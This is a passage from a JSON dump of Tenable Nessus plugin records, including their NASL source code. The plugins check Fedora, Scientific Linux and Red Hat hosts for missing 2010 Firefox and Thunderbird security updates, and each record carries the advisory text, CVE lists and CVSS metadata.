value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642300\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=646997\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050153.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b38de3df\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050154.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f01fc443\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050155.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?413f0147\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050156.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5084c6e0\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050157.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd4f6a09\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050158.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e237b4ed\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/050159.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7b4c5e7c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:galeon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-python2-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnome-web-photo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mozvoikko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"firefox-3.5.15-1.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"galeon-2.0.7-27.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"gnome-python2-extras-2.25.3-22.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"gnome-web-photo-0.9-11.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"mozvoikko-1.0-14.fc12\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"perl-Gtk2-MozEmbed-0.08-6.fc12.17\")) flag++;\nif (rpm_check(release:\"FC12\", reference:\"xulrunner-1.9.1.15-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / galeon / gnome-python2-extras / gnome-web-photo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:41:44", "references": ["http://www.nessus.org/u?e4e16434"], "pluginID": "60905", "description": "A race condition flaw was found in the way Thunderbird handled Document Object Model (DOM) element properties. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed HTML mail content. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nA same-origin policy bypass flaw was found in Thunderbird. Remote HTML content could steal private data from different remote HTML content Thunderbird had loaded. (CVE-2010-3178)\n\nNote: JavaScript support is disabled by default in Thunderbird. The above issues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The LD_LIBRARY_PATH variable was appending a '.' character, which could allow a local attacker to execute arbitrary code with the privileges of a different user running Thunderbird, if that user ran Thunderbird from within an attacker-controlled directory. (CVE-2010-3182)\n\nAll running instances of Thunderbird must be restarted for the update to take effect.", "edition": 4, "reporter": "Tenable", "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : thunderbird on SL6.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2013-11-27T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20101117_THUNDERBIRD_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=60905", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(60905);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/11/27 17:06:04 $\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"Scientific Linux Security Update : thunderbird on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Scientific Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition flaw was found in the way Thunderbird handled\nDocument Object Model (DOM) element properties. An HTML mail message\ncontaining malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Thunderbird. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed HTML mail\ncontent. An HTML mail message containing malicious content could cause\nThunderbird to crash or, potentially, execute arbitrary code with the\nprivileges of the user running Thunderbird. (CVE-2010-3175,\nCVE-2010-3176, CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nA same-origin policy bypass flaw was found in Thunderbird. Remote HTML\ncontent could steal private data from different remote HTML content\nThunderbird had loaded. (CVE-2010-3178)\n\nNote: JavaScript support is disabled by default in Thunderbird. The\nabove issues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The\nLD_LIBRARY_PATH variable was appending a '.' character, which could\nallow a local attacker to execute arbitrary code with the privileges\nof a different user running Thunderbird, if that user ran Thunderbird\nfrom within an attacker-controlled directory. (CVE-2010-3182)\n\nAll running instances of Thunderbird must be restarted for the update\nto take effect.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1103&L=scientific-linux-errata&T=0&P=6154\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e4e16434\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2013 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"thunderbird-3.1.6-1.el6_0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:45:34", "references": ["https://www.redhat.com/security/data/cve/CVE-2010-3178.html", "https://www.redhat.com/security/data/cve/CVE-2010-3175.html", "https://www.redhat.com/security/data/cve/CVE-2010-3183.html", "https://www.redhat.com/security/data/cve/CVE-2010-3182.html", "https://www.redhat.com/security/data/cve/CVE-2010-3176.html", "https://www.redhat.com/security/data/cve/CVE-2010-3765.html", "https://www.redhat.com/security/data/cve/CVE-2010-3180.html", "https://www.redhat.com/security/data/cve/CVE-2010-3179.html", "http://rhn.redhat.com/errata/RHSA-2010-0896.html"], "pluginID": "50648", "description": "An updated thunderbird package that fixes several security issues is now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nA race condition flaw was found in the way Thunderbird handled Document Object Model (DOM) element properties. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed HTML mail content. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nA same-origin policy bypass flaw was found in Thunderbird. Remote HTML content could steal private data from different remote HTML content Thunderbird had loaded. (CVE-2010-3178)\n\nNote: JavaScript support is disabled by default in Thunderbird. The above issues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The LD_LIBRARY_PATH variable was appending a '.' character, which could allow a local attacker to execute arbitrary code with the privileges of a different user running Thunderbird, if that user ran Thunderbird from within an attacker-controlled directory. (CVE-2010-3182)\n\nAll Thunderbird users should upgrade to this updated package, which resolves these issues. All running instances of Thunderbird must be restarted for the update to take effect.", "edition": 8, "reporter": "Tenable", "published": "2010-11-18T00:00:00", "title": "RHEL 6 : thunderbird (RHSA-2010:0896)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2018-07-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:thunderbird", "p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "REDHAT-RHSA-2010-0896.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50648", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0896. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50648);\n script_version (\"1.23\");\n script_cvs_date(\"Date: 2018/07/25 18:58:05\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44425);\n script_xref(name:\"RHSA\", value:\"2010:0896\");\n\n script_name(english:\"RHEL 6 : thunderbird (RHSA-2010:0896)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated thunderbird package that fixes several security issues is\nnow available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nA race condition flaw was found in the way Thunderbird handled\nDocument Object Model (DOM) element properties. An HTML mail message\ncontaining malicious content could cause Thunderbird to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Thunderbird. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed HTML mail\ncontent. An HTML mail message containing malicious content could cause\nThunderbird to crash or, potentially, execute arbitrary code with the\nprivileges of the user running Thunderbird. (CVE-2010-3175,\nCVE-2010-3176, CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nA same-origin policy bypass flaw was found in Thunderbird. Remote HTML\ncontent could steal private data from different remote HTML content\nThunderbird had loaded. (CVE-2010-3178)\n\nNote: JavaScript support is disabled by default in Thunderbird. The\nabove issues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The\nLD_LIBRARY_PATH variable was appending a '.' character, which could\nallow a local attacker to execute arbitrary code with the privileges\nof a different user running Thunderbird, if that user ran Thunderbird\nfrom within an attacker-controlled directory. (CVE-2010-3182)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3176.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3179.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3180.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3182.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3183.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2010-3765.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2010-0896.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected thunderbird and / or thunderbird-debuginfo\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:thunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0896\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"thunderbird-3.1.6-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"thunderbird-3.1.6-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"thunderbird-3.1.6-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"thunderbird-debuginfo-3.1.6-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"thunderbird-debuginfo-3.1.6-1.el6_0\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"thunderbird-debuginfo-3.1.6-1.el6_0\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird / thunderbird-debuginfo\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:18", "references": ["http://www.nessus.org/u?1e41d79b", "https://bugzilla.redhat.com/show_bug.cgi?id=642286", "https://bugzilla.redhat.com/show_bug.cgi?id=642294", "http://www.nessus.org/u?bcf76dcb", "https://bugzilla.redhat.com/show_bug.cgi?id=642275", "http://www.nessus.org/u?2b115b82", "http://www.nessus.org/u?ebdf7518", "https://bugzilla.redhat.com/show_bug.cgi?id=642277", "https://bugzilla.redhat.com/show_bug.cgi?id=642283", "http://www.nessus.org/u?0aba3310", "http://www.nessus.org/u?d4ae1e85", "http://www.nessus.org/u?a0b91fe2", "http://www.nessus.org/u?4bea5fe2", "https://bugzilla.redhat.com/show_bug.cgi?id=642300", "https://bugzilla.redhat.com/show_bug.cgi?id=642272", "https://bugzilla.redhat.com/show_bug.cgi?id=642290"], "pluginID": "50356", "description": "Update to new upstream Firefox version 3.6.11, fixing multiple security issues detailed in the upstream advisories :\n\nhttp://www.mozilla.org/security/known-vulnerabilities/firefox36.html#f irefox3.6.11\n\nUpdate also includes all packages depending on gecko-libs rebuilt against new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2010-10-28T00:00:00", "title": "Fedora 13 : firefox-3.6.11-1.fc13 / galeon-2.0.7-34.fc13 / gnome-python2-extras-2.25.3-23.fc13 / etc (2010-16593)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2015-10-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xulrunner", "p-cpe:/a:fedoraproject:fedora:firefox", "p-cpe:/a:fedoraproject:fedora:perl-Gtk2-MozEmbed", "cpe:/o:fedoraproject:fedora:13", "p-cpe:/a:fedoraproject:fedora:gnome-python2-extras", "p-cpe:/a:fedoraproject:fedora:gnome-web-photo", "p-cpe:/a:fedoraproject:fedora:galeon", "p-cpe:/a:fedoraproject:fedora:mozvoikko"], "id": "FEDORA_2010-16593.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50356", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-16593.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50356);\n script_version(\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2015/10/20 21:13:52 $\");\n\n script_cve_id(\"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\");\n script_bugtraq_id(44243, 44245, 44247, 44248, 44249, 44251, 44252, 44253);\n script_xref(name:\"FEDORA\", value:\"2010-16593\");\n\n script_name(english:\"Fedora 13 : firefox-3.6.11-1.fc13 / galeon-2.0.7-34.fc13 / gnome-python2-extras-2.25.3-23.fc13 / etc (2010-16593)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to new upstream Firefox version 3.6.11, fixing multiple\nsecurity issues detailed in the upstream advisories :\n\nhttp://www.mozilla.org/security/known-vulnerabilities/firefox36.html#f\nirefox3.6.11\n\nUpdate also includes all packages depending on gecko-libs rebuilt\nagainst new version of Firefox / XULRunner.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefox36.html#firefox3.6.11\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebdf7518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642272\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642290\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=642300\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-October/049829.html\n script_set_attribute(\n attribute:\"see_also\",\n 